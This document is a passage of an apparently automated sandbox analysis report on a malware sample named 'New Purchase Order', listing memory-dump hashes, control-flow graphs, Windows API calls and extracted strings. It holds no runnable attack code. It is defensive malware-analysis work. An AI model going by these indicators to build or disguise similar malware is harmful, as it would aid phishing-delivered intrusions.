                                                          • Opcode ID: 7c4b0e44a53a9d29a9ba745f80499fb26cbb04f358c0043646f7f52dcead8ec7
                                                          • Instruction ID: c13ba5d97bc22f7e63ea58cda0ff6158461da83113305193d1bad37d3eab6063
                                                          • Opcode Fuzzy Hash: 7c4b0e44a53a9d29a9ba745f80499fb26cbb04f358c0043646f7f52dcead8ec7
                                                          • Instruction Fuzzy Hash: B01110B5C007598FDB10CF9AD444BDEFBF4AB88314F14842AD859A7300D379A545CFA1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1397383135.0000000000CCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CCD000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ccd000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e2d1084cbb5eb7f45dac9a57e43094503761b93e24914522b8dc1544ceb5451e
                                                          • Instruction ID: 1a2d3b32cf73a170632a2a6b50d8c9ad3b5d6c0e94d6fa3378ae8bb4f3b5e364
                                                          • Opcode Fuzzy Hash: e2d1084cbb5eb7f45dac9a57e43094503761b93e24914522b8dc1544ceb5451e
                                                          • Instruction Fuzzy Hash: 9321D3B1504344DFDB09DF10D9C0F26BB65FB98324F24C57DEA0A4B256C336E856CAA2
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1397413468.0000000000CDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CDD000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_cdd000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ed3f345e20ecefac45f6614ab7ea08e13d6232b6fa3aeabf57d27425ff7fe0a2
                                                          • Instruction ID: bca7fac4b3559f51cee796e78693b3f04b2c1cfb3e7605b6e68c7cf052481ec5
                                                          • Opcode Fuzzy Hash: ed3f345e20ecefac45f6614ab7ea08e13d6232b6fa3aeabf57d27425ff7fe0a2
                                                          • Instruction Fuzzy Hash: 0021F571904300DFDB14DF14D9C4B26BB65EBC8314F24C56EDA4A4B356C336E857CA62
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1397413468.0000000000CDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CDD000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_cdd000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 517bfe69e0f939def96d01bf941e71b38f20601a042dd8c4bd3c020e4a90688b
                                                          • Instruction ID: a190a602d1cbdd16ff205b963563e3193e83a12a2e044cd9ddb8372f767ef3b8
                                                          • Opcode Fuzzy Hash: 517bfe69e0f939def96d01bf941e71b38f20601a042dd8c4bd3c020e4a90688b
                                                          • Instruction Fuzzy Hash: F8218E755093808FCB12CF24D994715BF71EB86314F28C5EBD9498F6A7C33A980ACB62
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1397383135.0000000000CCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CCD000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ccd000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8a9223d17f0c59b9928f2445ae754a3689dedab5288f4c6dbc5edc2f4224d076
                                                          • Instruction ID: 28d7f7fd96de2cf8566eb5daee07238efbb91498774d35c50bc6810a4f49f597
                                                          • Opcode Fuzzy Hash: 8a9223d17f0c59b9928f2445ae754a3689dedab5288f4c6dbc5edc2f4224d076
                                                          • Instruction Fuzzy Hash: 01110372404240DFCB05CF00D9C4B16BF71FB94324F24C2ADD90A0B656C33AE95ACBA1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1397383135.0000000000CCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CCD000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ccd000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c51ce2c7a773db880665d9e6f91400a8814342af94baf37d78b2765fff78901b
                                                          • Instruction ID: 3108d6cf26238119b7f9cccff2df943c1ba7274347e8a859d9cc58b994261273
                                                          • Opcode Fuzzy Hash: c51ce2c7a773db880665d9e6f91400a8814342af94baf37d78b2765fff78901b
                                                          • Instruction Fuzzy Hash: A101F7310083449BE7108A66CC84F66FBD8DF40320F14C47EED1A4A186C6789940C772
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1397383135.0000000000CCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CCD000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_ccd000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1cb984e15df66e30b125d19118293772d49b841d89d784b273d41a168d35218a
                                                          • Instruction ID: 5726dbf3ed58476ba19e333dc4d84a507fe2f27fd4e69425439701504970c256
                                                          • Opcode Fuzzy Hash: 1cb984e15df66e30b125d19118293772d49b841d89d784b273d41a168d35218a
                                                          • Instruction Fuzzy Hash: 50F0C2310043449FE7108A16CC84B62FBE8EB90334F18C46AED194F286C3789C84CB71
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1400046412.0000000004DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_4db0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: |s/@
                                                          • API String ID: 0-853176268
                                                          • Opcode ID: 2fd46758094c05388d7c1251e12810374e7765f7e4e8f3f99042f21a77bf2402
                                                          • Instruction ID: 192feef2d5d196461662d4d4b649fbf32fbbcb0a650d83451f750d84571155f1
                                                          • Opcode Fuzzy Hash: 2fd46758094c05388d7c1251e12810374e7765f7e4e8f3f99042f21a77bf2402
                                                          • Instruction Fuzzy Hash: 81C1B470B08790CFDB15CF68C5919AEFBF2AF86300B18895AD496DB365D634EC42CB91
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1400046412.0000000004DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_4db0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7772319053bb078b6b1e0199dede7b9358046ae5ae25fae62f95f79658934092
                                                          • Instruction ID: b95a62600ec4bb2e0cf9ecd32789b72ef811060733460659d2ef92aaca3167a1
                                                          • Opcode Fuzzy Hash: 7772319053bb078b6b1e0199dede7b9358046ae5ae25fae62f95f79658934092
                                                          • Instruction Fuzzy Hash: EE1270B2401B898EE710CF66EDDC18A7BA1BB8531CF604609E2613E2F5DBB4155ECF44
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1400046412.0000000004DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_4db0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b9177aa720c402ce70998d8209d84d89e693fc24467d248919e1037115e3cad4
                                                          • Instruction ID: da1d596c4377ef9be1ebcb6dc5f523f2845ef4b5188f54c88bb8ea0e53a9cc62
                                                          • Opcode Fuzzy Hash: b9177aa720c402ce70998d8209d84d89e693fc24467d248919e1037115e3cad4
                                                          • Instruction Fuzzy Hash: 96D10531C2065ADACB01EBA4E994A99B7B1FFD5300F10C79AE04937610FB70AEC5CB91
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1400046412.0000000004DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_4db0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b52ba207e4f1c355aee4a63eacaa7ee939284e03f9b81a20f2bb5c7448f33888
                                                          • Instruction ID: 9e47c3efb47e9917967aa798a6c4ab94a5afdbe88a3fd925b8304892c84267ef
                                                          • Opcode Fuzzy Hash: b52ba207e4f1c355aee4a63eacaa7ee939284e03f9b81a20f2bb5c7448f33888
                                                          • Instruction Fuzzy Hash: 41A16D36F00209CFCF05DFA5C8945EEB7B2FF84304B1585AAE846AB265DB31E955CB90
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1400046412.0000000004DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_4db0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c8303677bfb29e3f668eb192fcf5d72c98a5547dd1c0e63c4ac3408190586f46
                                                          • Instruction ID: 2e79d909bcfa4412429268a1f7ebfeb463e04b333c190bb8a6b2335381bea432
                                                          • Opcode Fuzzy Hash: c8303677bfb29e3f668eb192fcf5d72c98a5547dd1c0e63c4ac3408190586f46
                                                          • Instruction Fuzzy Hash: ADD1F431C2065ADACB01EBA5E954A99B7B1FFD5300F10C79AE08937610FB70AEC5CB91
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1400046412.0000000004DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_4db0000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5e245f0a217ccc12f4a9c0530518f229ccead75c1c32a97a43fb78e9e77a7656
                                                          • Instruction ID: f7593cc399028550ae10aef6a30236627748a6c479a9051a2ca73a013d20842d
                                                          • Opcode Fuzzy Hash: 5e245f0a217ccc12f4a9c0530518f229ccead75c1c32a97a43fb78e9e77a7656
                                                          • Instruction Fuzzy Hash: ACC1C4B2801B898ED710CF66EC9818ABBB1BB85718F654609E2617F2F1DBB4145ECF44
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1397576483.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d20000_New Purchase Order.jbxd
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1397576483.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_d20000_New Purchase Order.jbxd

                                                          Execution Graph

                                                          Execution Coverage:1.2%
                                                          Dynamic/Decrypted Code Coverage:5.1%
                                                          Signature Coverage:8%
                                                          Total number of Nodes:138
                                                          Total number of Limit Nodes:11

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 388 417b63-417b7f 389 417b87-417b8c 388->389 390 417b82 call 42f5a3 388->390 391 417b92-417ba0 call 42fba3 389->391 392 417b8e-417b91 389->392 390->389 395 417bb0-417bc1 call 42e043 391->395 396 417ba2-417bad call 42fe43 391->396 401 417bc3-417bd7 LdrLoadDll 395->401 402 417bda-417bdd 395->402 396->395 401->402
                                                          APIs
                                                          • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417BD5
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1939529560.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_400000_New Purchase Order.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Load
                                                          • String ID:
                                                          • API String ID: 2234796835-0

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 414 42c953-42c989 call 404643 call 42db53 NtClose
                                                          APIs
                                                          • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C984
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1939529560.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_400000_New Purchase Order.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Close
                                                          • String ID:
                                                          • API String ID: 3535843008-0
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0

                                                          Control-flow Graph

                                                          APIs
                                                          • PostThreadMessageW.USER32(UQ63g7r-,00000111,00000000,00000000), ref: 00414427
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1939529560.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_400000_New Purchase Order.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: MessagePostThread
                                                          • String ID: UQ63g7r-$UQ63g7r-
                                                          • API String ID: 1836367815-2341035416

                                                          Control-flow Graph

                                                          APIs
                                                          • PostThreadMessageW.USER32(UQ63g7r-,00000111,00000000,00000000), ref: 00414427
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1939529560.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_400000_New Purchase Order.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: MessagePostThread
                                                          • String ID: UQ63g7r-$UQ63g7r-
                                                          • API String ID: 1836367815-2341035416

                                                          Control-flow Graph

                                                          APIs
                                                          • PostThreadMessageW.USER32(UQ63g7r-,00000111,00000000,00000000), ref: 00414427
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1939529560.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_400000_New Purchase Order.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: MessagePostThread
                                                          • String ID: UQ63g7r-$UQ63g7r-
                                                          • API String ID: 1836367815-2341035416

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 333 417bde-417bdf 334 417be1-417bf3 333->334 335 417c55-417c67 333->335 339 417c2e-417c38 334->339 336 417c68-417c70 335->336 336->339 340 417c72-417c74 336->340 339->335 341 417c3a-417c3b 339->341 340->336 342 417c76-417c7a 340->342 343 417bca-417bd7 LdrLoadDll 341->343 344 417c3d 341->344 345 417c8c-417c98 342->345 346 417c7c-417c82 342->346 349 417bda-417bdd 343->349 344->335 350 417c99-417cae 345->350 347 417cc0-417cc1 346->347 348 417c84 346->348 348->350 351 417c87 348->351 352 417cb0 350->352 353 417d17-417d2b call 42b9b3 350->353 351->345 355 417cb2-417cbe 352->355 356 417d2e-417d3f 352->356 353->356 355->347
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1939529560.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_400000_New Purchase Order.jbxd
                                                          Yara matches

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 358 417bf8-417c23 360 417c70 358->360 361 417c25-417c28 358->361 362 417c72-417c74 360->362 363 417c2e-417c38 360->363 364 417be5-417bf3 361->364 365 417c2a 361->365 368 417c76-417c7a 362->368 369 417c68-417c6e 362->369 366 417c55-417c67 363->366 367 417c3a-417c3b 363->367 364->358 370 417bb8-417bc1 365->370 371 417c2c-417c38 365->371 366->369 372 417bca-417bd7 LdrLoadDll 367->372 373 417c3d 367->373 374 417c8c-417c98 368->374 375 417c7c-417c82 368->375 369->360 376 417bc3-417bc9 370->376 377 417bda-417bdd 370->377 371->366 371->367 372->377 373->366 380 417c99-417cae 374->380 378 417cc0-417cc1 375->378 379 417c84 375->379 376->372 379->380 381 417c87 379->381 382 417cb0 380->382 383 417d17-417d2b call 42b9b3 380->383 381->374 385 417cb2-417cbe 382->385 386 417d2e-417d3f 382->386 383->386 385->378
                                                          APIs
                                                          • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417BD5
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1939529560.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_400000_New Purchase Order.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Load
                                                          • String ID:
                                                          • API String ID: 2234796835-0

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 404 42cc63-42cca1 call 404643 call 42db53 RtlAllocateHeap
                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(?,0041E8EB,?,?,00000000,?,0041E8EB,?,?,?), ref: 0042CC9C
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1939529560.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_400000_New Purchase Order.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateHeap
                                                          • String ID:
                                                          • API String ID: 1279760036-0

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 409 42cca3-42cce1 call 404643 call 42db53 RtlFreeHeap
                                                          APIs
                                                          • RtlFreeHeap.NTDLL(00000000,00000004,00000000,3777EA40,00000007,00000000,00000004,00000000,004173E4,000000F4), ref: 0042CCDC
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1939529560.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_400000_New Purchase Order.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FreeHeap
                                                          • String ID:
                                                          • API String ID: 3298025750-0

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 419 42cce3-42cd1f call 404643 call 42db53 ExitProcess
                                                          APIs
                                                          • ExitProcess.KERNEL32(?,00000000,00000000,?,9A0A6B39,?,?,9A0A6B39), ref: 0042CD1A
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1939529560.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_400000_New Purchase Order.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExitProcess
                                                          • String ID:
                                                          • API String ID: 621844428-0

                                                          Control-flow Graph

                                                          control_flow_graph 424 1882c0a-1882c0f 425 1882c1f-1882c26 LdrInitializeThunk 424->425 426 1882c11-1882c18 424->426
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                          • API String ID: 0-2160512332
                                                          Strings
                                                          • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 018B54CE
                                                          • Critical section debug info address, xrefs: 018B541F, 018B552E
                                                          • corrupted critical section, xrefs: 018B54C2
                                                          • Critical section address, xrefs: 018B5425, 018B54BC, 018B5534
                                                          • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 018B540A, 018B5496, 018B5519
                                                          • double initialized or corrupted critical section, xrefs: 018B5508
                                                          • Thread is in a state in which it cannot own a critical section, xrefs: 018B5543
                                                          • Critical section address., xrefs: 018B5502
                                                          • undeleted critical section in freed memory, xrefs: 018B542B
                                                          • Thread identifier, xrefs: 018B553A
                                                          • Invalid debug info address of this critical section, xrefs: 018B54B6
                                                          • 8, xrefs: 018B52E3
                                                          • Address of the debug info found in the active list., xrefs: 018B54AE, 018B54FA
                                                          • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 018B54E2
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                          • API String ID: 0-2368682639
                                                          Strings
                                                          • RtlpResolveAssemblyStorageMapEntry, xrefs: 018B261F
                                                          • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 018B2506
                                                          • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 018B2498
                                                          • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 018B2602
                                                          • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 018B2412
                                                          • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 018B2624
                                                          • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 018B2409
                                                          • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 018B22E4
                                                          • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 018B24C0
                                                          • @, xrefs: 018B259B
                                                          • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 018B25EB
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                          • API String ID: 0-4009184096
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                          • API String ID: 0-2515994595
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                          • API String ID: 0-1700792311
                                                          Strings
                                                          • HandleTraces, xrefs: 018C8C8F
                                                          • VerifierFlags, xrefs: 018C8C50
                                                          • VerifierDlls, xrefs: 018C8CBD
                                                          • AVRF: -*- final list of providers -*- , xrefs: 018C8B8F
                                                          • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 018C8A3D
                                                          • VerifierDebug, xrefs: 018C8CA5
                                                          • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 018C8A67
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                          • API String ID: 0-3223716464
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                          • API String ID: 0-1109411897
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.1940402066.0000000001810000.00000040.00001000.00020000.00000000.sdmp, Offset: 01810000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1810000_New Purchase Order.jbxd
                                                          Similarity
                                                          • API ID:
